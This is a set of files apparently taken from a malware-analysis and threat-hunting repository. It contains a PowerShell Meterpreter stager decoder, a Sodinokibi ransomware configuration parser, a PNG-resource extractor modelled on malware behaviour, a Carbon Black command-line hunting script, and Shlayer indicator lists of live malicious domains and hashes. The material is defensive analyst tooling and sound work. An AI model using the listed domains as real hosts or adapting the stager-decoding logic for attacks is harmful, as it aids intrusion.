51 |     THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
52 | 


--------------------------------------------------------------------------------
/powershell_meterpreter_extractor/powershell_meterpreter_extractor.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import base64
 4 | import zlib
 5 | import argparse
 6 | import re
 7 | import os
 8 | 
 9 | 
10 | def get_parser():
11 |     parser = argparse.ArgumentParser()
12 |     parser.add_argument('-o', '--output', type=str, help='Provide a path to save final stage payload')
13 |     group = parser.add_mutually_exclusive_group(required=True)
14 |     group.add_argument('-i', '--input', type=str, help='Provide a base64 encoded string in the command line')
15 |     group.add_argument('-f', '--file', type=str, help='Provide a path to a file that contains a base64 encoded string')
16 | 
17 |     return parser
18 | 
19 | 
20 | def enumerate_base64string(b):
21 |     offset = b.lower().find("frombase64string(")
22 |     if offset > 0:
23 |         b64_end_offset = b[offset + 18:].find('"')
24 |         j = re.findall('[a-zA-Z0-9\.]{8,}', base64.b64decode(b[offset + 18:offset + 18 + b64_end_offset])[200:])
25 |         for z in j:
26 |             print "\t[*] Potential C2: " + z
27 |     else:
28 |         return 0
29 | 
30 | 
31 | def save_file(file_path, data):
32 |     if os.path.exists(file_path):
33 |         while True:
34 |             user_input = raw_input("\n[!] File '" + file_path + "' already exists. Overwrite? (y|n): ").lower()
35 |             if user_input == "no" or user_input == "n":
36 |                 print "Qutting."
37 |                 exit(0)
38 |             elif user_input == "yes" or user_input == "y":
39 |                 break
40 |             else:
41 |                 print "[!] Invalid response."
42 |                 continue
43 | 
44 |     with open(file_path, 'w') as fh:
45 |         for line in data:
46 |             fh.write("%s\n" % line)
47 | 
48 | 
49 | def get_stages(b64_string):
50 |     data_b64_mod = len(b64_string) % 4
51 |     if data_b64_mod != 0:
52 |         print "[!] Invalid base64 length. The original buffer will be truncated by %s bytes" % str(data_b64_mod)
53 |         b64_string = b64_string[:-data_b64_mod]
54 | 
55 |     # NOTE this may raise an exception, but that's okay. Caller is handling it.
56 |     stage1 = base64.b64decode(b64_string).decode("utf-16") + "\n"
57 |     stage2 = zlib.decompress(base64.b64decode(stage1.split('"')[1]), 31)
58 | 
59 |     return stage1, stage2
60 | 
61 | 
62 | def get_b64_string(args):
63 |     b64_string = args.input
64 | 
65 |     if args.file:
66 |         with open(args.file, "r") as fh:
67 |             b64_string = fh.read().strip()
68 | 
69 |     return b64_string
70 | 
71 | 
72 | def main():
73 |     parser = get_parser()
74 |     args = parser.parse_args()
75 |     b64_string = get_b64_string(args)
76 | 
77 |     try:
78 |         stage1, stage2 = get_stages(b64_string)
79 |         if not args.output:
80 |             print ("\n[*] First Stage: \n\t" + stage1)
81 |             print ("\n[*] Second Stage: \n\t" + stage2)
82 |             enumerate_base64string(stage2)
83 |         else:
84 |             save_file(args.output + "_first_stage.txt", [stage1])
85 |             save_file(args.output + "_shellcode.txt", [stage2])
86 |             print "\n[*] Saved stages to filesystem as: %s" % args.output
87 |             enumerate_base64string(stage2)
88 |     except Exception as error:
89 |         print error
90 | 
91 | 
92 | if __name__ == "__main__":
93 |     main()
94 | 


--------------------------------------------------------------------------------
/malware_specific/Sodinokibi/Sodinokibi_configparser.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | import binascii
 4 | import struct
 5 | from Crypto.Cipher import ARC4
 6 | from hashlib import sha256
 7 | from zlib import crc32
 8 | import time
 9 | import pefile
10 | ''' [+]20 June 2019
11 |     [-]This script is intended to extract relevant configuration information from Sodinkibi Samples
12 |     [-]This script may need to be updated as variants are updated
13 |     [!]jmyers'''
14 | __VERSION__ = '1.0'
15 | 
16 | 
17 | def config_data(config_meta):
18 |     global rc4_key
19 |     global data_len
20 |     rc4_key = config_meta[0:32]
21 |     data_len = struct.unpack("<l",config_meta[36::])
22 |     print("RC4 Key:\t%s") % rc4_key
23 |     print("Data length:\t%s") % data_len
24 | 
25 | 
26 | def config_parse(data):
27 |     print("Payload Offset:\t%s") % config_offset
28 |     config_data(data[config_offset:config_offset + 40])
29 |     enc_data = data[config_offset + 40:config_offset + 40 + data_len[0]]
30 |     calc_c32 = (hex(crc32(enc_data)))
31 |     c32 = binascii.hexlify(data[config_offset + 32:config_offset + 36])
32 |     c32 = "".join(map(str.__add__, c32[-2::-2] ,c32[-1::-2]))
33 |     if calc_c32[2::] == c32:
34 |         print("CRC32 Match:\t%s") % "".join(map(str.__add__, c32[-2::-2] ,c32[-1::-2]))
35 |     else:
36 |         print("[!]Mismatch\tEmbedded CRC32:%s\tCalculated:%s") % (c32, calc_c32[2::])
37 |     return (ARC4.new(rc4_key).decrypt(enc_data))
38 | 
39 | 
40 | 
41 | def config_setup(data):
42 |     global config_offset
43 |     print("\nFile Hash:\t%s") % sha256(data).hexdigest()
44 |     if data[112128:112160].isalnum() == True:
45 |         config_offset = 112128
46 |         out = config_parse(data)
47 |     elif data[111616:111648].isalnum() == True:
48 |         config_offset = 111616
49 |         out = config_parse(data)
50 |     elif data[109568:109600].isalnum() == True:
51 |         config_offset = 109568
52 |         out = config_parse(data)
53 |     elif data[111104:111136].isalnum() ==True:
54 |         config_offset = 111104
55 |         out = config_parse(data)
56 |     elif data[118784:118816].isalnum() == True:
57 |         config_offset = 118784
58 |         out = config_parse(data)
59 |     elif data[109056:109088].isalnum() == True:
60 |         config_offset = 109056
61 |         out = config_parse(data)
62 |     elif data[108544:108576].isalnum() == True:
63 |         config_offset = 108544
64 |         out = config_parse(data)
65 |     else:
66 |         print("[!!!]There is an issue with the Configuration Offset")
67 |         out = "DID NOT DECODE PROPERLY"
68 |     return out
69 | 
70 | def main():
71 |     try:
72 |         if sys.argv[1] == "-d":
73 |             files = os.listdir(sys.argv[2])
74 |             for x in files:
75 |                 data = open(sys.argv[2]+x, "r").read()
76 |                 out_file = config_setup(data)
77 |                 outf = open(sys.argv[2]+x+"_config_out.txt", "w")
78 |                 outf.write("File Hash:" + sha256(data).hexdigest())
79 |                 try:
80 |                     pe = pefile.PE(sys.argv[2]+x,fast_load=True)
81 |                     outf.write("Compiled Time:"+time.asctime(time.gmtime(pe.FILE_HEADER.TimeDateStamp)))
82 |                 except:
83 |                     print("shit")
84 |                 outf.write(out_file)
85 |                 outf.close()
86 |         else:
87 |             filepath = sys.argv[1]
88 |             data = open(filepath, "r").read()
89 |             config_setup(data)
90 |     except IndexError:
91 |         print('Sodinokibi Config Parser v%s\n' % __VERSION__)
92 |         print('Usage:\n\t%s path to file' % (sys.argv[0]))
93 |         print('\t%s -d directory of files' % (sys.argv[0]))
94 |         quit()
95 | 
96 | 
97 | if __name__ == "__main__":
98 |     main()
99 | 


--------------------------------------------------------------------------------
/png_extract/png_extract.cpp:
--------------------------------------------------------------------------------
  1 | #include "stdafx.h"
  2 | #include <windows.h>
  3 | 
  4 | #include <gdiplus.h>
  5 | #pragma comment(lib, "gdiplus.lib")
  6 | 
  7 | #include <gdiplusinit.h>
  8 | #include <gdiplusmem.h>
  9 | 
 10 | using namespace Gdiplus;
 11 | 
 12 | ///////////////////////////////////
 13 | 
 14 | int 
 15 | main( int argc, char* argv[] )
 16 | {
 17 |     DWORD offset             = 0;
 18 |     ULONG_PTR gdi            = NULL;
 19 |     GdiplusStartupInput gi   = { 0 };
 20 |     GdiplusStartupOutput* go = NULL;
 21 | 
 22 |     if ( argc != 3 )
 23 |     {
 24 |         printf( "usage: %s <input.exe> <output file name>\n", argv[ 0 ] );
 25 |         return 1;
 26 |     }
 27 | 
 28 |     Status ret = GdiplusStartup( &gdi, &gi, NULL );
 29 | 
 30 |     if ( ret != Status::Ok )
 31 |     {
 32 |         printf( "Unable to initialize GdiplusStartup: %d\n", ret );
 33 |         return 1;
 34 |     }
 35 | 
 36 |     if ( !gdi )
 37 |     {
 38 |         printf( "Invalid GdiplusStartup token\n" );
 39 |         return 1;
 40 |     }
 41 | 
 42 |     /* extract from PE passed on command line */
 43 | 
 44 |     HMODULE peh = LoadLibraryA( argv[ 1 ] );
 45 | 
 46 |     if ( !peh )
 47 |     {
 48 |         printf( "Unable to load %s: %d\n", argv[ 1 ], GetLastError() );
 49 |         return 1;
 50 |     }
 51 | 
 52 |     HANDLE hf = CreateFileA( argv[ 2 ], GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL );
 53 | 
 54 |     if ( hf == INVALID_HANDLE_VALUE ) 
 55 |     {
 56 |         printf( "Unable to create output file %s: %d\n", argv[ 2 ], GetLastError() );
 57 |         return 1;
 58 |     }
 59 | 
 60 |     /* loop over all png files */
 61 | 
 62 |     bool done = false;
 63 |     int index = 1;
 64 | 
 65 |     while ( !done )
 66 |     {
 67 |         HRSRC png = FindResourceA( peh, LPCSTR( MAKEINTRESOURCE( index ) ), "PNG" );
 68 | 
 69 |         if ( !png )     /* no more left */
 70 |             break;
 71 | 
 72 |         DWORD sz     = SizeofResource( peh, png );
 73 |         HGLOBAL hpng = LoadResource( peh, png );
 74 | 
 75 |         if ( !hpng )
 76 |         {
 77 |             printf( "Could not load resource at index %d: %d\n", index, GetLastError() );
 78 |             break;
 79 |         }
 80 | 
 81 |         void* raw  = ( BYTE* )LockResource( hpng );
 82 |         HANDLE buf = GlobalAlloc( GMEM_MOVEABLE, sz );
 83 | 
 84 |         if ( !buf )
 85 |         {
 86 |             printf( "Could not allocate via GlobalAlloc: %d\n", GetLastError() );
 87 |             break;
 88 |         }
 89 | 
 90 |         void* pbuf = GlobalLock( buf );
 91 | 
 92 |         CopyMemory( pbuf, raw, sz );
 93 | 
 94 |         IStream* stream = NULL;
 95 | 
 96 |         if ( CreateStreamOnHGlobal( buf, FALSE, &stream ) != S_OK )
 97 |         {
 98 |             printf( "Could not create stream: %d\n", GetLastError() );
 99 |             break;
100 |         }
101 | 
102 |         Bitmap bm( stream, false );
103 |         stream->Release();
104 | 
105 |         /* NOTE: PixelFormat16bppARGB1555 == 0x61007 as seen in malware */
106 | 
107 |         BitmapData* bdata = new BitmapData;
108 | 
109 |         /* NOTE: malware specified 0x7 which == ImageLockModeRead | ImageLockModeWrite | ImageLockModeUserInputBuf, but this blows up, ImageLockModeRead works fine */
110 | 
111 |         Status lock_status = bm.LockBits( NULL, ImageLockModeRead, PixelFormat16bppARGB1555, bdata );
112 | 
113 |         if ( lock_status != Ok )
114 |             break;
115 | 
116 |         /* Display the hexadecimal value of each pixel */
117 | 
118 |         UINT* pixels = ( UINT* )bdata->Scan0;
119 | 
120 |         DWORD written = 0;
121 |         BOOL err      = WriteFile( hf, pixels, bdata->Height * bdata->Width * 2, &written, NULL );      /* x2 is for 16bpp */
122 | 
123 |         index++;
124 |     }
125 | 
126 |     CloseHandle( hf );
127 | 
128 |     GdiplusShutdown( gdi );
129 | 
130 |     return 0;
131 | }
132 | 


--------------------------------------------------------------------------------
/threat_hunting/CB-Command_R/README.md:
--------------------------------------------------------------------------------
  1 |       ________      _____                              __   ___
  2 |      / ___/ _ )____/ ___/__  __ _  __ _  ___ ____  ___/ /  / _ \
  3 |     / /__/ _  /___/ /__/ _ \/  ' \/  ' \/ _ `/ _ \/ _  /  / , _/
  4 |     \___/____/    \___/\___/_/_/_/_/_/_/\_,_/_//_/\_,_/__/_/|_|
  5 |                                                      /___/
  6 | 
  7 | ### Carbon Black Response - Mass Command Line Data Extractor
  8 | 
  9 | Multithreaded large-scale Carbon Black Response Command Line Data Extraction
 10 | 
 11 | ## Installation
 12 | 
 13 | This script is meant to run with Python version 2, however it can work with Python v3 with some simple modifications.
 14 | 
 15 | First things first, install the requirements:
 16 | 
 17 |     $ pip install -r requirements.txt
 18 | 
 19 | Modify config.py to include your Carbon Black Response domain and associated API key.
 20 | 
 21 | This setting allows for multiple configurations - just make sure the one you would like to use is placed within the 'active' section.
 22 | 
 23 | ## Execution
 24 | 
 25 | Run the script with -h or --help to view the help options:
 26 | 
 27 |     usage: cb-command_r.py [-h] [-q QUERY] [-t THREADS] [-r ROWS] [-s START] [-f FILENAME]
 28 |       optional arguments:
 29 |        -h, --help            show this help message and exit
 30 |        -q QUERY, --query QUERY
 31 |                              Carbon Black Response Query
 32 |                              Default: (process_name:cmd.exe)
 33 |        -t THREADS, --threads THREADS
 34 |                              Number of simultaneous threads
 35 |                              Default: 25
 36 |        -r ROWS, --rows ROWS  
 37 |                              Rows per thread (USE MULTIPLES OF 10!)
 38 |                              Default: 1000
 39 |        -s START, --start START
 40 |                              Select the starting row
 41 |                              Default: 0
 42 |        -f FILENAME, --filename FILENAME
 43 |                              Output results
 44 |                              Default: commands.txt
 45 | 
 46 | Running the script with no options will utilize the defaults as described above, however these can be customized to fit with the number of queries you're pulling. Below is more information on each flag:
 47 | 
 48 | ##### -q | --query: 
 49 | 
 50 | Defines the Carbon Black Response formatted query you'd like to search to associated command line parameters across. This will work with any process but some recommended ones:
 51 | 
 52 |     process_name:cmd.exe (default)
 53 |     process_name:powershell.exe
 54 |     process_name:bash
 55 |     process_name:sh
 56 | 
 57 | ##### -t | --threads:
 58 | 
 59 | Defines the number of simultaneous threads you would like to run. You should aim to keep this below 50 to avoid running into issues with storing large amounts of data in memory.
 60 | 
 61 |     Default value: 25
 62 | 
 63 | If you choose to run this script with 1 thread, this will make only a single API call for the command line arguments.
 64 | 
 65 | ##### -r | --rows:
 66 | 
 67 | Defines the number of rows to pull back per thread. These must be defined in increments of 10, due to how multithreading is configured in this script.
 68 | 
 69 | The absolute maximum you can query from a single thread is 10,000
 70 | 
 71 | Available options:
 72 | 
 73 |     1, 10, 100, 1000, 10000
 74 |     Default value: 1000
 75 | 
 76 | ##### -s | --start:
 77 | 
 78 | Defines the starting row the script will begin searching over. Default is 1, but can be adjusted to start from wherever you left off after a prior request
 79 | 
 80 |     Default value: 1
 81 | 
 82 | ##### -f | --filename:
 83 | 
 84 | Defines where you would like to save the output of the script.
 85 | 
 86 |     Default value: commands.txt
 87 | 
 88 | ### Author
 89 | 
 90 | gfoss[at]carbonblack.com
 91 | 
 92 | March, 2019
 93 | 
 94 | ### Example
 95 | 
 96 | Help Menu:
 97 | 
 98 | ![cb-command_r_1](https://user-images.githubusercontent.com/727732/53764619-07939700-3e8b-11e9-8fc4-b8c5dae7cd07.png)
 99 | 
100 | Query Execution:
101 | 
102 | ![cb-command_r_2](https://user-images.githubusercontent.com/727732/53764627-0bbfb480-3e8b-11e9-90bd-b620ca452b91.png)
103 | 


--------------------------------------------------------------------------------
/threat_hunting/IOCs/shlayer/domain-iocs.txt:
--------------------------------------------------------------------------------
  1 | 34.225.46.51
  2 | api.adminbuffer.com
  3 | api.agentrotator.com
  4 | api.algorithmmode.com
  5 | api.appmotiondaily.com
  6 | api.assistivehandler.com
  7 | api.assistiverotator.com
  8 | api.assistivesmart.com
  9 | api.assistivesource.com
 10 | api.assistpartition.com
 11 | api.assistremote.com
 12 | api.basicinitiator.com
 13 | api.binarysources.com
 14 | api.bitelemnt.com
 15 | api.browsedisplay.com
 16 | api.browserinterop.com
 17 | api.bufferqueue.com
 18 | api.catchthemac.com
 19 | api.choiceupdate.com
 20 | api.commonprocesser.com
 21 | api.coordinatornano.com
 22 | api.defaultindexer.com
 23 | api.elemnttech.com
 24 | api.essentialarchive.com
 25 | api.essentialupdater.com
 26 | api.filterkey.com
 27 | api.filtermode.com
 28 | api.functioninput.com
 29 | api.functionmemory.com
 30 | api.handlerkey.com
 31 | api.helperportal.com
 32 | api.indexereng.com
 33 | api.inettasks.com
 34 | api.initialprocess.com
 35 | api.initiatormaster.com
 36 | api.internetalgorithm.com
 37 | api.interopcache.com
 38 | api.launcheremote.com
 39 | api.lightthemacup.com
 40 | api.locatorbasic.com
 41 | api.locatorformat.com
 42 | api.macsinsights.com
 43 | api.macsmoments.com
 44 | api.macthrills.com
 45 | api.managerscalable.com
 46 | api.masteranalyser.com
 47 | api.megaelemnt.com
 48 | api.megaformats.com
 49 | api.megamodule.com
 50 | api.netsmode.com
 51 | api.operativdata.com
 52 | api.operativebox.com
 53 | api.operativeguides.com
 54 | api.opticalinput.com
 55 | api.opticalmode.com
 56 | api.opticalsample.com
 57 | api.optimalword.com
 58 | api.originaloption.com
 59 | api.originmodule.com
 60 | api.portalqueue.com
 61 | api.processbuffer.com
 62 | api.publicanalyser.com
 63 | api.publicconfig.com
 64 | api.resultsformat.com
 65 | api.syncindexer.com
 66 | api.taskupgrade.com
 67 | api.timefornaps.com
 68 | api.ultrabitinitiator.com
 69 | api.updateelement.com
 70 | api.updaterengine.com
 71 | api.upgradehandler.com
 72 | api.upgradeinput.com
 73 | api.upgradenano.com
 74 | www.aww799.com
 75 | 24upgradecheck.thereadyforsafestubs.icu
 76 | app4com.thereadyforsafestubs.icu
 77 | downgradepc.bestcenter2content.icu
 78 | get.securybrowse.com
 79 | kasefe.otlu.pw
 80 | mixtypecloudtheclicks.icu
 81 | mixtypedowngradetheclicks.icu
 82 | nkejt.spoonwolf.pw
 83 | noteupgrade.freeandgreatappsite.icu
 84 | nowversion.thebeststubcontentingfrees.icu
 85 | pxesa.peoplefrozen.pw
 86 | readyupdate.freeandgreatappsite.icu
 87 | rlksl.dealrudolf.pw
 88 | upgradebestfreshtheclicks.icu
 89 | wpdtk.tribunebegin.pw
 90 | www.apple.com-care-macbook-system.live
 91 | www.enginetransaction.com
 92 | www.logicalhandler.com
 93 | api.agentinput.com
 94 | api.alphaelemnt.com
 95 | api.analysercloud.com
 96 | api.analyserdesk.com
 97 | api.analyserinput.com
 98 | api.analyzedisplay.com
 99 | api.appfastplay.com
100 | api.appsreforoma.com
101 | api.archivekey.com
102 | api.assistiveformat.com
103 | api.assistivenet.com
104 | api.bitcoordinator.com
105 | api.cachemega.com
106 | api.cleanconfig.com
107 | api.configentry.com
108 | api.contemporaryapps.com
109 | api.dynamicmodule.com
110 | api.elementarylocator.com
111 | api.elementaryprocess.com
112 | api.enthusiasmness.com
113 | api.etagarring.com
114 | api.executiveinterface.com
115 | api.explorertask.com
116 | api.filterapps.com
117 | api.filtercommand.com
118 | api.findscheduler.com
119 | api.formatlog.com
120 | api.futuristmac.com
121 | api.highsecuritymac.com
122 | api.initiatormode.com
123 | api.insidetechmac.com
124 | api.internetinterop.com
125 | api.logicalwindow.com
126 | api.macfantsy.com
127 | api.macmagnificent.com
128 | api.macsatmosphere.com
129 | api.majorenumerator.com
130 | api.majorprocess.com
131 | api.majorqueue.com
132 | api.managerwebmoves.com
133 | api.metroorigin.com
134 | api.microstransaction.com
135 | api.nanodevsource.com
136 | api.nanoscheduler.com
137 | api.optimalcache.com
138 | api.optimizerdata.com
139 | api.originassist.com
140 | api.partitionnet.com
141 | api.portalconfig.com
142 | api.portalelemnt.com
143 | api.primarymodes.com
144 | api.primarytransaction.com
145 | api.processerdev.com
146 | api.processformat.com
147 | api.remocreature.com
148 | api.rotatorbit.com
149 | api.rotatorsample.com
150 | api.servereng.com
151 | api.servicequeue.com
152 | api.setwireframe.com
153 | api.sharedanalyser.com
154 | api.sourceremote.com
155 | api.syncpartition.com
156 | api.technanoproject.com
157 | api.techsmaturity.com
158 | api.trackindexer.com
159 | api.trustedadmins.com
160 | api.updaterbasic.com
161 | api.webmemoryagent.com
162 | api.whywarbler.com
163 | api.wisercomputers.com
164 | 


--------------------------------------------------------------------------------
/threat_hunting/CB-Command_R/cb-command_r.py:
--------------------------------------------------------------------------------
  1 | #!/usr/env python
  2 | 
  3 | # CB-Command_R
  4 | # Carbon Black Response - Mass Command Line Data Extractor
  5 | # gfoss[at]carbonblack.com
  6 | # March, 2019
  7 | 
  8 | import sys, time, argparse, requests, json, threading, thread
  9 | from config import active
 10 | 
 11 | global_lock = threading.Lock()
 12 | file_contents = []
 13 | 
 14 | def parse_all_things():
 15 |   parser = argparse.ArgumentParser(description = 'Multithreaded large-scale Carbon Black Response Command Line Data Extraction')
 16 |   parser.add_argument('-q', '--query', help = 'Carbon Black Response Query - Default: (process_name:cmd.exe)', default='process_name:cmd.exe', dest='query')
 17 |   parser.add_argument('-t', '--threads', help = 'Number of simultaneous threads - Default: 25', default='25', dest='threads')
 18 |   parser.add_argument('-r', '--rows', help = 'Rows per thread (USE MULTIPLES OF 10!) - Default: 1000', default='1000', dest='rows')
 19 |   parser.add_argument('-s', '--start', help = 'Select the starting row - Default: 0', default='0', dest='start')
 20 |   parser.add_argument('-f', '--filename', help = 'Output results - Default: commands.txt', default='commands.txt', dest='filename', )
 21 |     #
 22 |     # usage: cb-command_r.py [-h] [-q QUERY] [-t THREADS] [-r ROWS] [-s START] [-f FILENAME]
 23 |     #
 24 |     # Multithreaded large-scale Carbon Black Response Commandline Data Extraction
 25 |     #
 26 |     # optional arguments:
 27 |     #  -h, --help            show this help message and exit
 28 |     #  -q QUERY, --query QUERY
 29 |     #                        Carbon Black Response Query
 30 |     #                        Default: (process_name:cmd.exe)
 31 |     #  -t THREADS, --threads THREADS
 32 |     #                        Number of simultaneous threads
 33 |     #                        Default: 25
 34 |     #  -r ROWS, --rows ROWS  
 35 |     #                        Rows per thread (USE MULTIPLES OF 10!)
 36 |     #                        Default: 1000
 37 |     #  -s START, --start START
 38 |     #                        Select the starting row
 39 |     #                        Default: 0
 40 |     #  -f FILENAME, --filename FILENAME
 41 |     #                        Output results
 42 |     #                        Default: commands.txt
 43 |     #
 44 |   return parser
 45 | 
 46 | def extractor(parser, args, start_count):
 47 |   url = active['url']
 48 |   api_key = active['key']
 49 |   
 50 |   query = args.query
 51 |   querystring = {"q":args.query,"rows":args.rows,"start":start_count}
 52 | 
 53 |   payload = ""
 54 |   headers = { 'X-Auth-Token': api_key }
 55 | 
 56 |   # If you receieve SSL certificate errors, add ", verify=False" to the below request
 57 |   response = requests.request("GET", url, data=payload, headers=headers, params=querystring)
 58 |   data = json.loads(response.content)
 59 | 
 60 |   if int(args.threads) > 1:
 61 | 
 62 |     while global_lock.locked():
 63 |       continue
 64 | 
 65 |     global_lock.acquire()
 66 |     rows = int(args.rows)
 67 |     for num in range(rows):
 68 |       datas = (data['results'][num]['cmdline']).encode('utf8')
 69 |       file_contents.append(datas)
 70 |     global_lock.release()
 71 | 
 72 |   else:
 73 | 
 74 |     orig_stdout = sys.stdout
 75 |     f = open(args.filename, 'a')
 76 |     sys.stdout = f
 77 |     rows = int(args.rows)
 78 |     for num in range(rows):
 79 |       print (data['results'][num]['cmdline']).encode('utf8')
 80 |     sys.stdout = orig_stdout
 81 |     f.close()
 82 | 
 83 | def main():
 84 | 
 85 |   print '''
 86 |       ________      _____                              __   ___ 
 87 |      / ___/ _ )____/ ___/__  __ _  __ _  ___ ____  ___/ /  / _ \\
 88 |     / /__/ _  /___/ /__/ _ \\/  \' \\/  \' \\/ _ `/ _ \\/ _  /  / , _/
 89 |     \\___/____/    \\___/\\___/_/_/_/_/_/_/\\_,_/_//_/\\_,_/__/_/|_| 
 90 |                                                      /___/      
 91 |   '''
 92 | 
 93 |   parser = parse_all_things()
 94 |   args = parser.parse_args()
 95 | 
 96 |   thread_count = args.threads
 97 |   start_count = args.start
 98 |   rows = args.rows
 99 | 
100 |   if int(thread_count) > 1:
101 |     
102 |     print 'Extracting the last ' + thread_count + str(rows)[1:] + ' commands related to: ' + args.query
103 |     print 'Running with ' + thread_count + ' threads!'
104 |     print ''
105 |     thread_count = int(thread_count)
106 | 
107 |     threads = []
108 |     for num in range(thread_count):
109 |       iteration = str(rows)[1:]
110 |       start_count = str(num) + iteration
111 |       print 'Pulling ' + start_count + ' rows of command line data'
112 |       t = threading.Thread(target=extractor, args=(parser,args,start_count,))
113 |       threads.append(t)
114 |       t.start()
115 |     [thread.join() for thread in threads]
116 | 
117 |     with open(args.filename, 'a+') as file:
118 |       file.write('\n'.join(file_contents))
119 |       file.close()
120 | 
121 |     print ''
122 |     print 'Writing output to ' + args.filename
123 |     print ''
124 | 
125 |   else:
126 |     print "Making a single API request for " + rows + " records..."
127 |     extractor(parser, args, start_count)
128 | 
129 |     print ''
130 |     print 'Writing output to ' + args.filename
131 |     print ''
132 |     
133 | if __name__ == "__main__":
134 |   main()
135 | 


--------------------------------------------------------------------------------
/threat_hunting/IOCs/shlayer/hashes-iocs.txt:
--------------------------------------------------------------------------------
 1 | fd30ef485adc2a9d4a26e20b2f32cc37e1299e2f1eff4d0b30ccc2e481a9f281,136a08bef2b6a4e51fcc8b35ee21935a
 2 | 5006b352cecafdd4df49a8bf9d60a940c2dfc89fe86851f2548dbfe0ec6db922,ce43184c39fb347cca95ec74f53dd45d
 3 | 53ff1f062d4ac7ac8271ceea4bf5b911f992e55b23531bdd87943dbc3594f59b,7ceb17c99a30d642438d4cf336160634
 4 | c1046768a19bfbd2aa9492443d8cbac8dc310073587c907553967b4d24fbabf8,fe7ed909dc974d3383c9e840bf60dc3b
 5 | 5982a969f1cff3880538b6dbfa813312b59bc536ef91e9f8b506dd2c4ce1a132,9c12864507cb278c6f8870a2e8120da5
 6 | 6d8bc0896eddb994a53424ec4ce9b705a4f0f8df86c6f8572a08f3c49f56623e,fceda183d84477027f44c59d83405597
 7 | 0d0d7ff140f892129789da2446474837480fa71e95462139673d7f3f648df5df,c19d247ad5a9f4fe44366a8345dee3ad
 8 | a3af79d42b9917d73a6f896a48682f74f91c00929f80ee77d6a0fa7ad3552de1,9059044f5b2362a03d2eccecf1bcad87
 9 | 18bba2995ffe6c14c5b7c515dd92cef8db5f56099e298f2581e43764df55276c,74ecf6892135890efdf5552ac006e36a
10 | f960bad1b78a3ac8217aa9223c2228dd8479acdca29a6e4c6d2d620d122d6237,3d218a55054008dcd75f0646e9d19411
11 | 35a4b126fd13c95e25d08edb745aeec5a3a4b3bc01705fc0e003156f831e3c0a,e37698f258d73e7ddf5696fa73eaf8d5
12 | 513cd785513bbf45c424144378ffa80fa21685de30a85940bf82f2db72a8560d,327a994483d67f6b14f884e17feb4f3c
13 | c43fdfc0658177fd4a570495ca9917b1a9d9e21088efdd3326232e15cc19cabe,aa64d69250acf2e0181763f75c5d75d6
14 | df67759101e803baf9efc18da9907fe4cda1e088667434ce548e1731d904f4d7,cb304cb44c087efd874ebedfd2315301
15 | 9817a479649a7573d223bc9d563f8bdfbf809aa104e7d78d09251086ea756814,1e7df7ae2601cc71dcd867b9bff876b5
16 | 59c7bb9c0200d4513119c9f52ecbf85ab5462f9fc924a55bf92bdd8ffa864abe,7d6b6e961527851c882407e11f93ea0e
17 | ddc9d36bc1641e0084c2eecd35f820692b9a1c8cdd09f1db5cb3cc32e0738e35,6014535031bd988ff2f3bd8ac60dc203
18 | 06b16f5d5cb7fb1646168267fe936b71e891c1b2bab0560c3f3c513d0526ee97,27aed07f2c7a45e0d4da7b5d2a8c7c64
19 | 6b3c540d03245bfcf5f64195025eaa53332eccd39c47a6d82de339fd218b34bb,d7bb1240038f07b84bc54631160c7a8d
20 | 7ac5da59868fe308e68d0375395b97a6237b362a4a4073b3288e5b5e5e53919e,0990f967610ec161ebb11bd4dad47652
21 | 8ad48b482dcd8d893dd8193acf2436383d9ddf65f55cf2ec47a4e0de3b2c22bf,8a4ce1973b7a1208b82b4e016462903c
22 | f639a800f8e68928b6ac613d4aaa1817a1c532fc581b715cc986cd833b11e7da,681ba69ff9a78b0fe1fa51268b48e5c2
23 | 66650d9eac1fd331991682c9fc6f932cb2c7595a0c16a1ed477ba8a2e6ee58e6,3759a005931511779694878807da3d47
24 | 05900d6bb07d0b80f96cf60f3384db65af7e27663db0fe9f9b09e504743f1fa0,60b105be4718cad66752d2900fb7918a
25 | d2f52f19a73481d8b7d0906cea8b44490bdc866d6945dc0ae826a56821aba90d,2c25685668f82d104db0b039c00c700f
26 | 12610ded5495bb0fd0309a855f398ab955af9d1382a5db53ee6cf88a26479a92,3fc0b9e00e5247eed5d104de019ee818
27 | a2ec5d9c80794c26a7eaac8586521f7b0eb24aba9ad393c194c86cfd150e5189,4b3ab1a5dccac06cc67856cde9b78885
28 | b53fab9dd4b473237a39895372aae51638b25d8f7a659c24d0a3cc21d03ef159,b490bdd3899fa6dc06787d49cb64b405
29 | fd93c08678392eae99a1281577a54875a0e1920c49cdea6d56b53dabc4597803,b7a66df8b280cef879de978501cbd12f
30 | 68d5629d6faeae646b2b6a0c6b607a8d0ce8d8798429f24c3b308ac552c27b28,3803d9dd1d4e6c7c4587ce7f80088ec9
31 | 23762000bb36adc0d95c3e589dfc2d81a766e9d37dce7e80bb591fee64491b63,47e5fa673370cec483492b1ed282966d
32 | 5eee6ea1f69c4e263afee5443a78a3da962d404de50ae762a399e43afa49424e,89b34f0dbb834e2dc338c52ba906b104
33 | d64e0989bf17e687b5f9fa11befb57405f4574a18c8a1312ba0f6c991daf101f,e446fd443eda8e0f17ddc3fd02f81fa3
34 | f5bb88b0a44902a8c5d5079453ffe06377460c9e8a0ce27ac8b08643aa3e52fa,99e4152951a11d82736b3ad6218f4664
35 | 5248b3612c51aceb8505af2d27ecea3da4f6a9d2203d25aefa5bd6015134110b,a654ae58ef9a44423f8237b6d5a667ac
36 | 92e8482a5b243db39eaf1d176a3a52b8974fb58c8d4804a9e04c0d66495d263d,8d55404f788478328110a2c513432101
37 | ac49889cb93ada0b247e4eb73900be3ee5e0ca09e07d04687fb467390a75a38e,b0c4dac5b092d1f58882109ea0046982
